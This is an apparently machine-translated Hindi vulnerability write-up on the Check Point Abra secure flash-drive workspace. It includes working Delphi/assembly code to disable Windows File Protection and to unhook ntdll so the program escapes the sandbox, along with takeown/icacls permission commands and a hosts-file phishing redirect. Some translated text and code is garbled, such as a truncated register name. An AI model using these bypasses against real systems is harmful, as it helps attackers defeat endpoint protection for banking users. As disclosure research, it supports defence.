चेकपॉइंट Abra - "विश्वसनीय" फ्लैश ड्राइव में अंतराल

सूचना सुरक्षा बाजार में, अधिक से अधिक नए एंड-कस्टमर प्रोटेक्शन टूल (आरबीएस, ईआरपी / एसएपी, और इसी तरह) हैं। मूल्य निर्धारण के अलावा, हम में से बहुत कम लोग संरक्षण की प्रभावशीलता के विश्लेषण के साथ आए हैं जो वे वास्तव में प्रदान कर सकते हैं।



समूह-आईबी विशेषज्ञों ने चेकपॉइंट एबर उत्पाद के संभावित अंतराल का विश्लेषण करने के लिए एक अध्ययन किया, जो एक विशेष रूप से कॉन्फ़िगर किया गया वियोज्य माध्यम है जो आपको किसी भी कंप्यूटर पर एक सुरक्षित वर्चुअल वर्कस्टेशन को व्यवस्थित करने की अनुमति देता है जिससे यह जुड़ा हुआ है।

प्रविष्टि

डिवाइस की दावा की गई तकनीकी विशेषताओं को पूर्वस्थापित अनुप्रयोगों के साथ एक विशेष आभासी संरक्षित वातावरण लॉन्च करके, ओएस में संचालन के संदर्भ में एक अलग सॉफ्टवेयर वातावरण प्रदान करना संभव बनाता है। सभी संग्रहीत डेटा जो इसके डिस्क वातावरण में लिखा गया है, एन्क्रिप्ट किया गया है।

वास्तव में, समाधान का उद्देश्य मोबाइल क्लाइंट की रक्षा करना है जो अविश्वसनीय पीसी, इंटरनेट कैफे (यदि इसे वियोज्य मीडिया स्थापित करने की अनुमति है) और अन्य हॉट स्पॉट से काम कर सकते हैं।

अनुप्रयोग नियंत्रण नियम विशेष फाइलों में स्थित हैं जो श्वेतसूची में वर्णित हैं:

F: \ PWC \ data \ sandbox-persistence.ref
F: \ PWC \ data \ swspogo.xml
F: \ PWC \ data \ ISWPolicy.xml
F: \ PWC \ data \ ics_policy.xml

सुरक्षित सत्र में काम करने पर श्वेत सूची से किसी भी आवेदन को निष्पादित नहीं किया जा सकता है।


अंजीर। 1 - एक तृतीय-पक्ष एप्लिकेशन शुरू करने के प्रयास को अवरुद्ध करने के बारे में एक संदेश के साथ एक खिड़की जो अनुमत सूची में नहीं है

कमजोरियों का पता लगाया

1. एक सुरक्षित सत्र में तीसरे पक्ष के कार्यक्रम शुरू करना

सत्र के भीतर, यह केवल पहले से इंस्टॉल किए गए प्रोग्रामों को चलाने की अनुमति है इंटरनेट एक्सप्लोरर, नोटपैड, कैलकुलेटर, कार्यालय, रिमोट डेस्कटॉप कनेक्शन (+ पोर्टेबल एप्स) और मेजबान मशीन के सिस्टम उपयोगिताओं का उपयोग करें, जो कॉन्फ़िगरेशन फ़ाइल "F: PWC \ data \ sandbox- दृढ़ता में संकेतित हैं।" रेफरी "।

/>


अंजीर। 2 - अनुप्रयोग स्टार्टअप नियंत्रण नीति फ़ाइल सामग्री

सत्र अनुप्रयोग नियंत्रण केवल फ़ाइल नाम पथ, साथ ही फ़ाइल में VersionInfo प्रविष्टियों द्वारा चल रहे एप्लिकेशन की जाँच करता है। इसका मतलब है कि आप एक मनमाना एप्लिकेशन आयात कर सकते हैं और इसे फ़िल्टर को दरकिनार करके चला सकते हैं। यह किसी भी श्वेत सूची में वर्जनइन्फो सेक्शन के फाइल नाम और उसके ओरिजिनलफिल्म क्षेत्र को बदलकर किया जाता है। इसके अलावा, एक सुरक्षित सत्र में किसी भी आयात के बिना होस्ट ओएस (उदाहरण के लिए, WinRar संग्रहकर्ता) पर एक मनमाना उपयोगकर्ता निष्पादन योग्य फ़ाइल को बदलना संभव है, और यह फ़ाइल स्वचालित रूप से एक सुरक्षित सत्र (एक्सटेंशन मेनू से या प्रारंभ मेनू के अनुसार लॉन्च करके) में निष्पादित की जाएगी।

आप प्रारंभ मेनू (इंटरनेट एक्सप्लोरर, नोटपैड, कैलकुलेटर) से प्रीइंस्टॉल्ड एप्लिकेशन को भी बदल सकते हैं, होस्ट ओएस पर फ़ाइल सुरक्षा को अक्षम कर सकते हैं, और आपको व्यवस्थापक अधिकारों की आवश्यकता होगी। सिस्टम फ़ाइलों को प्रतिस्थापित करने के बाद sfc_os.dll सिस्टम फ़ाइल (विंडोज़ xp) द्वारा निर्यात किए गए पाँचवें फ़ंक्शन को कॉल करके विंडोज फ़ाइल सुरक्षा को अक्षम करने के बाद लागू किया जा सकता है।

कोड उदाहरण:

hInst := LoadLibrary('sfc_os.dll');
proc := GetProcAddress(hInst, ordinal 5);
filename := 'c:\windows\system32\calc.exe';
asm
push -1
push filename
push 0
call proc
end

या फ़ाइल अनुमतियों को संशोधित करके (विस्टा और उच्चतर):

टेकडाउन / एफ <फ़ाइल नाम>
icacls <फ़ाइल नाम> /%% उपयोगकर्ता नाम%: F
icacls <file_name> / अनुदान * S-1-1-0: (F)

उदाहरण के लिए, संरक्षित सत्र में कैलकुलेटर शुरू करने के बाद, प्रपत्र C: \ Windows \ System32 \ calc.exe (या C: \ Windows \ SysWOW64 \ calc.exe) की एक फ़ाइल, यदि संरक्षित सत्र 64-बिट प्लेटफ़ॉर्म पर चल रहा है, तो सिस्टम फ़ोल्डर से निष्पादित किया जाएगा। ) एक अलग कंडक्टर में।


अंजीर। 3 - सफलतापूर्वक OllyDbg पर एक डिफ़ॉल्ट प्रोग्राम परिवर्तन हमले (कैलकुलेटर) का आयोजन

2. पूर्वस्थापित अनुप्रयोगों का विश्लेषण

स्थापित पोर्टेबल अनुप्रयोगों के सेट पूर्व-तैयार उत्पाद वितरण का उपयोग करते हैं, हमेशा नवीनतम संस्करण नहीं और हमेशा अद्यतन नहीं होते हैं। उदाहरण के लिए, फ़ाइलज़िला सर्वर 2006 संस्करण 2.2.26a (आधिकारिक वेबसाइट संस्करण 3.5.3 2012 पर नवीनतम बिल्ड)।


अंजीर। 4 - पूर्वस्थापित अनुप्रयोगों के गैर-संस्करणित संस्करण

3. प्रक्रियाओं की संरचना का विश्लेषण और एक सुरक्षित सत्र का बूटलोडर

जब एक संरक्षित सत्र चल रहा होता है, तो एक अलग प्रक्रिया समूह बनाया जाता है।


अंजीर। 5 - XXXX

निष्पादन योग्य फ़ाइलों और उत्पाद पुस्तकालयों को 2 विधानसभाओं में प्रस्तुत किया जाता है: 32 और 64-बिट। इसके बावजूद, 64-बिट सिस्टम पर, F: \ Go \ PWC \ WoW64 फ़ोल्डर में स्थित कई 32-बिट मॉड्यूल अभी भी लॉन्च किए गए हैं। ISWMGR.exe प्रक्रिया का दूसरा उदाहरण explorer.exe खोजकर्ता प्रक्रिया शुरू करता है, जो सभी बाहरी उपयोगिताओं और आयातित कार्यक्रमों के माता-पिता हैं जो एक सुरक्षित सत्र में खोले जाते हैं।


अंजीर। 6 - XXXX

एक संरक्षित सत्र के अंदर आयातित फ़ाइलों को लॉन्च करते समय, उन्हें एक अलग लोडर एप्लिकेशन F: \ PWC \ WOW64 \ ISWLDR.dat (छवि 8, सिस्टम उपयोगिताओं के लिए, लोडर द्वारा शुरू किए बिना पुस्तकालय लोड किया जाता है) द्वारा लॉन्च किया जाता है। यह बदले में, हुक को स्थापित करने के लिए InitHook फ़ंक्शन को कॉल करके ISWUL.dll लाइब्रेरी को लोड करता है (छवि 9, छवि 10)। फाइल, रजिस्ट्री, क्लिपबोर्ड, क्रिप्टोग्राफी, आदि के साथ काम करने के लिए कॉलिंग फ़ंक्शंस के लिए सेट इंटरसेप्ट्स।


अंजीर। 7 - ISWLDR.dat बूटलोडर डिबगिंग विंडो (डिबगिंग टूल एक सुरक्षित सत्र के भीतर लॉन्च किया गया था, एप्लिकेशन लॉन्च कंट्रोल टूल को दरकिनार करके)


अंजीर। 8 - Abra लोडर द्वारा शुरू किए गए एप्लिकेशन की स्मृति में मूल LoadLibraryExW फ़ंक्शन का कोड


अंजीर। 9 - Abra बूटलोडर द्वारा लॉन्च किए गए एप्लिकेशन की याद में लोडलॉउंड्सएक्सडब्ल्यूडब्ल्यू फ़ंक्शन का कोड (वर्चुअल पते पर इसके द्वारा स्थापित इंटरसेप्टर के साथ 765A2097)

एक उदाहरण के रूप में क्लिपबोर्ड फिल्टर का उपयोग करके फ़ंक्शन हुक इंस्टॉलेशन कोड की असंतुष्ट सूची। तकनीक को SetClipboardData क्लिपबोर्ड के साथ काम करने के कार्यों को लागू करके कार्यान्वित किया जाता है। GetClipboardData, OpenClipboard, EmptyClipboard, CloseClipboard और अपने स्वयं के कॉलबैक हैंडलर सेट करना:

 HANDLE (__stdcall *__cdecl GetAddrOf_SetClipboardData())(UINT, HANDLE) { HANDLE (__stdcall *result)(UINT, HANDLE); // eax@1 result = SetClipboardData; addr_SetClipboardData = SetClipboardData; return result; } int __cdecl hooks_Clipboard() { int v0; // eax@1 int v1; // eax@3 int v2; // eax@5 int v3; // eax@7 int result; // eax@9 v0 = splice_func(addr_SetClipboardData, callback_SetClipboardData); if ( v0 ) addr_SetClipboardData = v0; v1 = splice_func(addr_GetClipboardData, callback_GetClipboardData); if ( v1 ) addr_GetClipboardData = v1; v2 = splice_func(addr_OpenClipboard, callback_OpenClipboard); if ( v2 ) addr_OpenClipboard = v2; v3 = splice_func(addr_EmptyClipboard, callback_EmptyClipboard); if ( v3 ) addr_EmptyClipboard = v3; result = splice_func(addr_CloseClipboard, callback_CloseClipboard); if ( result ) addr_CloseClipboard = result; return result; } 

इंटरसेप्टर फ़ंक्शंस को बंद करके (उन्हें संशोधित करने से पहले फ़ंक्शन कोड को पुनर्स्थापित करना) संभव है - सिस्टम फ़ोल्डर से फ़ाइलों को सीधे पढ़ने से (तकनीक का उपयोग करने के लिए, सिस्टम फ़ाइलों को पढ़ने से पहले एक अस्थायी फ़ोल्डर में कॉपी किया जाना चाहिए और एक संरचित अपवाद अपवाद स्थापित किया जाता है), उदाहरण के लिए ntdll.dll, पढ़ना फ़ाइल से फ़ंक्शन के पहले 10-15 बाइट्स और मेमोरी में संबंधित फ़ंक्शन के रीड बफर के साथ प्रस्तावना को अधिलेखित करें (जिस पर इंटरसेप्टर फ़ंक्शन के लिए कूद, उदाहरण के लिए ZwLoadDriver) स्थित है। एक तकनीक, उदाहरण के लिए, आप एक सुरक्षित सत्र से सीधे होस्ट सिस्टम में files \ रजिस्ट्री में परिवर्तन करने की अनुमति दे सकते हैं।

उदाहरण कोड जो मेमोरी में सिस्टम लाइब्रेरी के मूल कोड को पुनर्स्थापित करके इंटरसेप्ट को रीसेट करने की तकनीक को लागू करता है:

 unit notepad; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, Buttons, ShlObj; type TForm1 = class(TForm) Memo1: TMemo; BitBtn1: TBitBtn; procedure FormCreate(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; Dst: array[1..12] of byte; implementation {$R *.dfm} function GetSpecialPath(CSIDL: word): string; var s: string; begin SetLength(s, MAX_PATH); if not SHGetSpecialFolderPath(0, PChar(s), CSIDL, true) then s := GetSpecialPath(CSIDL_APPDATA); result := PChar(s); end; procedure memcpy; asm push ebp mov ebp, esp push ebx push esi push edi cmp [ebp+8], 0 jz @loc_416538 cmp [ebp+$0C], 0 jz @loc_416538 cmp [ebp+$10], 0 jg @loc_41653C @loc_416538: xor eax, eax jmp @loc_41654B @loc_41653C: pusha mov esi, [ebp+$0C] mov edi, [ebp+$08] mov ecx, [ebp+$10] rep movsb popa xor eax, eax @loc_41654B: pop edi pop esi pop ebx pop ebp retn end; procedure resolve_APIs_from_dll_images(mapped_ntdll_base: pointer; dllname: string); var var_4, var_8, var_10, var_20, var_24, var_2C, var_28, var_3C, var_1C, dllbase, Src, old: DWORD; begin asm pushad mov eax, [mapped_ntdll_base] mov ecx, [eax+3Ch] mov edx, [mapped_ntdll_base] lea eax, [edx+ecx+18h] mov [var_10], eax mov ecx, [var_10] mov edx, [mapped_ntdll_base] add edx, [ecx+60h] mov [var_4], edx mov eax, [var_4] mov ecx, [mapped_ntdll_base] add ecx, [eax+1Ch] mov [var_8], ecx mov ecx, [var_4] mov edx, [mapped_ntdll_base] add edx, [ecx+20h] mov [var_20], edx mov eax, [var_4] mov ecx, [mapped_ntdll_base] add ecx, [eax+24h] mov [var_2C], ec push dllname call LoadLibrary mov [var_28], eax cmp [var_28], 0 jne @loc_41D111 jmp @ending @loc_41D111: mov [var_24], 0 jmp @loc_41D135 @loc_41D11A: mov eax, [var_24] add eax, 1 mov [var_24], eax mov ecx, [var_20] add ecx, 4 mov [var_20], ecx mov edx, [var_2C] add edx, 2 mov [var_2C], edx @loc_41D135: mov eax, [var_4] mov ecx, [var_24] cmp ecx, [eax+18h] jnb @ending mov ecx, [var_24] mov edx, [var_20] mov eax, [mapped_ntdll_base] add eax, [edx] mov ecx, [var_24] mov edx, [var_8] mov eax, [var_28] add eax, [edx+ecx*4] mov [var_3C], eax mov ecx, [var_24] mov edx, [var_8] mov eax, [mapped_ntdll_base] add eax, [edx+ecx*4] mov [Src], eax push 0Ah mov ecx, [Src] push ecx lea edx, [Dst] push edx call memcpy add esp, 0Ch lea eax, [old] push eax push PAGE_EXECUTE_READWRITE push $0A mov eax, [var_3C] push eax call VirtualProtect push 0Ah lea ecx, [Dst] push ecx mov eax, [var_3C] push eax call memcpy add esp, 0Ch jmp @loc_41D11A @ending: popad end; end; function UnHook(dllname: string): boolean; var size: DWORD; MapHandle: THandle; FileHandle: THandle; dll, filename: string; LogFileStartOffset: pointer; Begin dll := SystemDir + '\' + dllname; filename := GetSpecialPath(CSIDL_APPDATA) + '\' + dllname; result := CopyFile(PChar(dll), PChar(filename), false); if result then begin FileHandle := CreateFile(pChar(filename), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0); If FileHandle <> INVALID_HANDLE_VALUE then Try MapHandle := CreateFileMapping(FileHandle, nil, $1000002, 0, 0, nil); If MapHandle <> 0 then Try LogFileStartOffset := MapViewOfFile(MapHandle, FILE_MAP_READ, 0, 0, 0); If LogFileStartOffset <> nil then Try size := GetFileSize(FileHandle, nil); resolve_APIs_from_dll_images(LogFileStartOffset, dllname); Finally UnmapViewOfFile(LogFileStartOffset); End; Finally // CloseHandle(MapHandle); End; Finally // CloseHandle(FileHandle); End; DeleteFile(filename); end; End; procedure write2file(filename, s: string); var f: textfile; begin assignfile(f, filename); rewrite(f); writeln(f, s); closefile(f); end; procedure TForm1.FormCreate(Sender: TObject); var a: PChar; begin a := 'ntdll.dll'; UnHook(a); write2file('c:\users\Administrator\Desktop\POC.txt', 'Now we writing to host OS'); end; 

ABRA GO आपको एक सुरक्षित सत्र के अंदर RDP, vnc क्लाइंट या vnc सर्वर शुरू करने की अनुमति नहीं देता है। TightVNC RFB प्रोटोकॉल क्लाइंट के उदाहरण का उपयोग करते हुए, एप्लिकेशन नियंत्रण बाईपास विधि का उपयोग करके, क्लाइंट और VNC सर्वर को शुरू करना संभव है, लेकिन सर्वर कनेक्शन उपयोगिता शुरू करने और डेस्कटॉप को देखने के मामले में, एक सुरक्षित कनेक्शन नहीं होता है।

क्लाइंट उपयोगिता को लॉन्च करने के मामले में, होस्ट ओएस जुड़ा हुआ है और डेस्कटॉप पर देखा जाता है (जब पता 127.0.0.1 9900 से जुड़ा होता है), लेकिन डेस्कटॉप को प्रबंधित करने की संभावना नहीं है (साथ ही साथ एक सुरक्षित सत्र के फ़ोल्डर्स को देखने और प्रबंधित करने की भी)।

फिशिंग अटैक

होस्ट सिस्टम के etc \ मेजबान फ़ाइल को संशोधित करके फ़िशिंग हमले को लागू करना संभव है, जिसमें सभी परिवर्तन स्वचालित रूप से सुरक्षित सत्र पर लागू होते हैं।


अंजीर। 10 - सफलतापूर्वक एक फ़िशिंग हमले का आयोजन: जब आप habrahabr.ru संसाधन को खोलने का प्रयास करते हैं, तो एक और खुलता है - खोज इंजन पृष्ठ yandex.ru

परिणाम

आधुनिक लोगों सहित सूचना सुरक्षा उपकरणों का उपयोग, उनकी क्षमताओं के एक उद्देश्य मूल्यांकन पर आधारित होना चाहिए। आरबीएस सिस्टम के ग्राहकों पर विशेष ध्यान दिया जाना चाहिए, जो बैंकों की सलाह पर विभिन्न सुरक्षा प्रणालियों का उपयोग करना चाहते हैं। विशेष हार्डवेयर का उपयोग क्लाइंट की सुरक्षा को बढ़ाना संभव बनाता है, लेकिन सभी संभावित जोखिमों को काटने से दूर।